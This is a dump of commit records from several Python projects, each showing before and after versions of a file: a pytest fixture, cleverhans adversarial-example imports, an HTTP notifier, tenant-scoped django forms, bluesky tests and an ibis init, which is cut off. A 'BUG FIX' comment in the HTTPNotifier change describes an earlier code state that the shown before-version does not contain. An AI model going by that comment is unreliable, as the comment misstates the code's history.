    request.addfinalizer(server.stop)
    return server
@pytest.fixture(autouse=True, scope='function')
def _casper_js_live_server_helper(request):
if 'capser_js' in request.funcargnames:
request.getfuncargvalue('transactional_db')
<commit_msg>Remove the helper-fixture, we make transactions explicit. Will write documentation about that<commit_after>import os
import pytest
from pytest_django.lazy_django import skip_if_no_django
@pytest.fixture(scope='session')
def casper_js(request):
skip_if_no_django()
from pytest_django_casperjs.helper import CasperJSLiveServer
addr = request.config.getvalue('liveserver')
if not addr:
addr = os.getenv('DJANGO_TEST_LIVE_SERVER_ADDRESS')
if not addr:
addr = 'localhost:8081,8100-8200'
server = CasperJSLiveServer(addr)
request.addfinalizer(server.stop)
return server
|
a3c768ab90d1354441d90699049f7dd946e683c2 | cleverhans/future/torch/attacks/__init__.py | cleverhans/future/torch/attacks/__init__.py | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
| # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| Allow spsa to be imported from cleverhans.future.torch.attacks | Allow spsa to be imported from cleverhans.future.torch.attacks
| Python | mit | cleverhans-lab/cleverhans,cleverhans-lab/cleverhans,cleverhans-lab/cleverhans | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
Allow spsa to be imported from cleverhans.future.torch.attacks | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| <commit_before># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
<commit_msg>Allow spsa to be imported from cleverhans.future.torch.attacks<commit_after> | # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| # pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
Allow spsa to be imported from cleverhans.future.torch.attacks# pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
| <commit_before># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
<commit_msg>Allow spsa to be imported from cleverhans.future.torch.attacks<commit_after># pylint: disable=missing-docstring
from cleverhans.future.torch.attacks.fast_gradient_method import fast_gradient_method
from cleverhans.future.torch.attacks.projected_gradient_descent import projected_gradient_descent
from cleverhans.future.torch.attacks.noise import noise
from cleverhans.future.torch.attacks.semantic import semantic
from cleverhans.future.torch.attacks.spsa import spsa
|
e572dcb08e9c89d11c4702927561ef9c2ebc3cb1 | custos/notify/http.py | custos/notify/http.py | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.

        :param recipient: URL to post to.
        :param msg: message object providing ``to_dict()``.
        '''
        try:
            params = msg.to_dict()
            # An attached image cannot travel as an URL query parameter.
            params.pop('image', None)
            # Message fields are sent as an URL query string (params=).
            ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except:
            # Delivery is best-effort: log and swallow any failure so one
            # unreachable recipient cannot take the notifier down.
            # NOTE(review): the bare except also catches KeyboardInterrupt /
            # SystemExit — presumably unintended; consider 'except Exception'.
            log.exception('Could not post message')
| import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, json=True, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :param json: If True, send message as json payload, else use an url query string
        :type json: bool
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        self.json = json
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.'''
        try:
            params = msg.to_dict()
            # An attached image cannot be serialized for this transport.
            params.pop('image', None)
            if self.json is True:
                # timestamp/uuid objects are not JSON serializable; send
                # their string representations instead.
                params['timestamp'] = str(params['timestamp'])
                params['uuid'] = str(params['uuid'])
                ret = requests.post(recipient, json=params, auth=self.auth)
            else:
                ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except Exception:
            # BUG FIX: the previous version had a body-less
            # 'except ConnectionError:' clause directly followed by a bare
            # 'except:', which is a SyntaxError. One broad handler keeps
            # delivery best-effort: log and swallow any failure.
            log.exception('Could not post message')
| Add option to send message as json payload in HTTPNotifier | Add option to send message as json payload in HTTPNotifier
| Python | mit | fact-project/pycustos | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
Add option to send message as json payload in HTTPNotifier | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, json=True, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :param json: If True, send message as json payload, else use an url query string
        :type json: bool
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        self.json = json
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.'''
        try:
            params = msg.to_dict()
            # An attached image cannot be serialized for this transport.
            params.pop('image', None)
            if self.json is True:
                # timestamp/uuid objects are not JSON serializable; send
                # their string representations instead.
                params['timestamp'] = str(params['timestamp'])
                params['uuid'] = str(params['uuid'])
                ret = requests.post(recipient, json=params, auth=self.auth)
            else:
                ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except Exception:
            # BUG FIX: the previous version had a body-less
            # 'except ConnectionError:' clause directly followed by a bare
            # 'except:', which is a SyntaxError. One broad handler keeps
            # delivery best-effort: log and swallow any failure.
            log.exception('Could not post message')
| <commit_before>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
<commit_msg>Add option to send message as json payload in HTTPNotifier<commit_after> | import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, json=True, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :param json: If True, send message as json payload, else use an url query string
        :type json: bool
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        self.json = json
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.'''
        try:
            params = msg.to_dict()
            # An attached image cannot be serialized for this transport.
            params.pop('image', None)
            if self.json is True:
                # timestamp/uuid objects are not JSON serializable; send
                # their string representations instead.
                params['timestamp'] = str(params['timestamp'])
                params['uuid'] = str(params['uuid'])
                ret = requests.post(recipient, json=params, auth=self.auth)
            else:
                ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except Exception:
            # BUG FIX: the previous version had a body-less
            # 'except ConnectionError:' clause directly followed by a bare
            # 'except:', which is a SyntaxError. One broad handler keeps
            # delivery best-effort: log and swallow any failure.
            log.exception('Could not post message')
| import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
Add option to send message as json payload in HTTPNotifierimport logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, json=True, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :param json: If True, send message as json payload, else use an url query string
        :type json: bool
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        self.json = json
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.'''
        try:
            params = msg.to_dict()
            # An attached image cannot be serialized for this transport.
            params.pop('image', None)
            if self.json is True:
                # timestamp/uuid objects are not JSON serializable; send
                # their string representations instead.
                params['timestamp'] = str(params['timestamp'])
                params['uuid'] = str(params['uuid'])
                ret = requests.post(recipient, json=params, auth=self.auth)
            else:
                ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except Exception:
            # BUG FIX: the previous version had a body-less
            # 'except ConnectionError:' clause directly followed by a bare
            # 'except:', which is a SyntaxError. One broad handler keeps
            # delivery best-effort: log and swallow any failure.
            log.exception('Could not post message')
| <commit_before>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
''' A Notifier that sends http post request to a given url '''
def __init__(self, auth=None, **kwargs):
'''
Create a new HTTPNotifier
:param auth: If given, auth is handed over to request.post
:param recipients: The urls to post to.
:type recipients: Iterable of recipients or dict mapping categories to recipients
:param categories: The message categories this Notifier should relay
:type categories: Iterable
:param level: The minimum level for messages to be relayed
:type level: int
'''
self.auth = auth
super().__init__(**kwargs)
def notify(self, recipient, msg):
try:
params = msg.to_dict()
params.pop('image', None)
ret = requests.post(recipient, params=params, auth=self.auth)
ret.raise_for_status()
except:
log.exception('Could not post message')
<commit_msg>Add option to send message as json payload in HTTPNotifier<commit_after>import logging
import requests
from .base import Notifier
log = logging.getLogger(__name__)
class HTTPNotifier(Notifier):
    ''' A Notifier that sends http post request to a given url '''
    def __init__(self, auth=None, json=True, **kwargs):
        '''
        Create a new HTTPNotifier
        :param auth: If given, auth is handed over to request.post
        :param recipients: The urls to post to.
        :param json: If True, send message as json payload, else use an url query string
        :type json: bool
        :type recipients: Iterable of recipients or dict mapping categories to recipients
        :param categories: The message categories this Notifier should relay
        :type categories: Iterable
        :param level: The minimum level for messages to be relayed
        :type level: int
        '''
        self.auth = auth
        self.json = json
        super().__init__(**kwargs)
    def notify(self, recipient, msg):
        '''Post *msg* to the *recipient* URL; failures are logged, not raised.'''
        try:
            params = msg.to_dict()
            # An attached image cannot be serialized for this transport.
            params.pop('image', None)
            if self.json is True:
                # timestamp/uuid objects are not JSON serializable; send
                # their string representations instead.
                params['timestamp'] = str(params['timestamp'])
                params['uuid'] = str(params['uuid'])
                ret = requests.post(recipient, json=params, auth=self.auth)
            else:
                ret = requests.post(recipient, params=params, auth=self.auth)
            ret.raise_for_status()
        except Exception:
            # BUG FIX: the previous version had a body-less
            # 'except ConnectionError:' clause directly followed by a bare
            # 'except:', which is a SyntaxError. One broad handler keeps
            # delivery best-effort: log and swallow any failure.
            log.exception('Could not post message')
|
c47c334eb10c331266a2469c0975698722c2cbb4 | towel/mt/forms.py | towel/mt/forms.py | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
    """Restrict every queryset-backed field on *form* to the objects
    visible to the current tenant (``request.access``)."""
    for field in form.fields.values():
        queryset = getattr(field, 'queryset', None)
        if not queryset:
            # Non-relational field (or an empty queryset): nothing to scope.
            continue
        accessible = queryset.model.objects.for_access(request.access)
        field.queryset = safe_queryset_and(queryset, accessible)
class Form(forms.Form):
    # Form that scopes every queryset-backed field to the current tenant;
    # instantiation requires a mandatory ``request`` keyword argument.
    def __init__(self, *args, **kwargs):
        # ``request`` is required: pop() raises KeyError if it is missing.
        self._request = kwargs.pop('request')
        super(Form, self).__init__(*args, **kwargs)
        _process_fields(self, self._request)
class ModelForm(forms.ModelForm):
    # ModelForm variant of ``Form`` above: same mandatory ``request``
    # keyword argument, same per-tenant field scoping.
    def __init__(self, *args, **kwargs):
        # ``request`` is required: pop() raises KeyError if it is missing.
        self._request = kwargs.pop('request')
        super(ModelForm, self).__init__(*args, **kwargs)
        _process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
    # Search forms receive the request through towel's post_init() hook
    # rather than through __init__, so tenant scoping happens here.
    def post_init(self, request):
        self._request = request
        _process_fields(self, self._request)
| """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| Stop being secretive about it | Stop being secretive about it
| Python | bsd-3-clause | matthiask/towel,matthiask/towel,matthiask/towel,matthiask/towel | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
Stop being secretive about it | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| <commit_before>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
<commit_msg>Stop being secretive about it<commit_after> | """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| """
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
Stop being secretive about it"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
| <commit_before>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self._request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self._request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self._request = request
_process_fields(self, self._request)
<commit_msg>Stop being secretive about it<commit_after>"""
Forms
=====
These three form subclasses will automatically add limitation by tenant
to all form fields with a ``queryset`` attribute.
.. warning::
If you customized the dropdown using ``choices`` you have to limit the
choices by the current tenant yourself.
"""
from django import forms
from towel import forms as towel_forms
from towel.utils import safe_queryset_and
def _process_fields(form, request):
for field in form.fields.values():
if getattr(field, 'queryset', None):
model = field.queryset.model
field.queryset = safe_queryset_and(
field.queryset,
model.objects.for_access(request.access),
)
class Form(forms.Form):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(Form, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class ModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
self.request = kwargs.pop('request')
super(ModelForm, self).__init__(*args, **kwargs)
_process_fields(self, self.request)
class SearchForm(towel_forms.SearchForm):
def post_init(self, request):
self.request = request
_process_fields(self, self.request)
|
70ee0532f68a08fa12ba7bbfb217273ca8ef7a48 | bluesky/tests/test_simulators.py | bluesky/tests/test_simulators.py | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| Test that plan_tools import works but warns. | TST: Test that plan_tools import works but warns.
| Python | bsd-3-clause | ericdill/bluesky,ericdill/bluesky | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
TST: Test that plan_tools import works but warns. | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| <commit_before>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
<commit_msg>TST: Test that plan_tools import works but warns.<commit_after> | from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
TST: Test that plan_tools import works but warns.from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
| <commit_before>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
<commit_msg>TST: Test that plan_tools import works but warns.<commit_after>from bluesky.plans import scan
from bluesky.simulators import print_summary, print_summary_wrapper
import pytest
def test_print_summary(motor_det):
motor, det = motor_det
print_summary(scan([det], motor, -1, 1, 10))
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
def test_old_module_name(motor_det):
from bluesky.plan_tools import print_summary, print_summary_wrapper
motor, det = motor_det
with pytest.warns(UserWarning):
print_summary(scan([det], motor, -1, 1, 10))
with pytest.warns(UserWarning):
list(print_summary_wrapper(scan([det], motor, -1, 1, 10)))
|
b748de5c965219688562819b3cabad1b7ee357d1 | ibis/__init__.py | ibis/__init__.py | # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
args = ['--pyargs', 'ibis']
if not include_e2e:
args.extend(['-m', 'not e2e'])
pytest.main(args)
| # Copyright 2014 Cloudera Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ibis.connection import impala_connect
import ibis.expr.api as api
import ibis.expr.types as ir
from ibis.expr.api import desc
import ibis.config_init
from ibis.config import options
def test(include_e2e=False):
import pytest
